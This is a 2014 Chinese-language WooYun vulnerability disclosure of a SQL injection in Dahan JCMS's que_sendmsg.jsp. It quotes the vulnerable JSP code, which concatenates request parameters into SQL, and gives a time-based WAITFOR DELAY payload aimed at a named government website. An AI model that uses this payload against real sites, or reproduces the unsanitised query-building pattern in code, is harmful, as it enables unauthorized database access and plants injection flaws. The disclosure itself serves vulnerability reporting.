当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-061819

漏洞标题:大汉JCMS 注入漏洞3

相关厂商:南京大汉网络有限公司

漏洞作者: Matt

提交时间:2014-05-22 10:49

修复时间:2014-08-20 10:50

公开时间:2014-08-20 10:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-22: 细节已通知厂商并且等待厂商处理中
2014-05-22: 厂商已经确认,细节仅向厂商公开
2014-05-25: 细节向第三方安全合作伙伴开放
2014-07-16: 细节向核心白帽子及相关领域专家公开
2014-07-26: 细节向普通白帽子公开
2014-08-05: 细节向实习白帽子公开
2014-08-20: 细节向公众公开

简要描述:

大汉JCMS 注入漏洞3

详细说明:

short_message/que_sendmsg.jsp

String strTitle = "";
/*检索关键字*/
String groupname = "";
String id = Convert.getParameter(request, "loginid", "a");//获取参数
String boxtype = Convert.getParameter(request, "boxtype", "a");
strTitle += groupname;

// 获取表单提交变量(条件参数)
String strQueKeyWords = "";//关键字
String strQueKeyWords1 = "";//高级检索关键字
String strQueScope = "";//范围
String strStartDate = "";//开始日期
String strEndDate = "";//结束日期

strQueKeyWords = Convert.getParameter(request, "que_keywords");
strQueKeyWords1 = Convert.getParameter(request, "que_keywords1");
strQueScope = Convert.getParameter(request, "que_scope");
strStartDate = Convert.getParameter(request, "que_startdate");
strEndDate = Convert.getParameter(request, "que_enddate");
strQueKeyWords = (strQueKeyWords1.length() > 0) ? strQueKeyWords1
: strQueKeyWords;//高级检索的关键字优先
//组织时间条件
String strDateCond = "";
if (!"".equals(strStartDate) && !"".equals(strEndDate)) {
strDateCond += " AND a.dt_sendtime >= '" + strStartDate
+ " 00:00:00' AND a.dt_sendtime <= '" + strEndDate + " 23:59:59'";
} else if (!"".equals(strStartDate) && "".equals(strEndDate)) {
strDateCond += " AND a.dt_sendtime >= '" + strStartDate + " 00:00:00'";
} else if ("".equals(strStartDate) && !"".equals(strEndDate)) {
strDateCond += " AND a.dt_sendtime <= '" + strEndDate + " 23:59:59'";
}

// 查询条件部分
StringBuffer sbWhere = new StringBuffer(128);
strTitle = "当前位置→发件箱";
sbWhere.append(" a.vc_senderid='"+ id +"'");//插入参数

漏洞证明:

打开http://www.sihong.gov.cn/jcms/short_message/que_sendmsg.jsp?loginid=1 返回时间正常
打开http://www.sihong.gov.cn/jcms/short_message/que_sendmsg.jsp?loginid=1' ; WAITFOR DELAY '0:0:5'-- 延时了

dahan.png

修复方案:

过滤

版权声明:转载请注明来源 Matt@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-05-22 11:14

厂商回复:

问题重复

最新状态:

暂无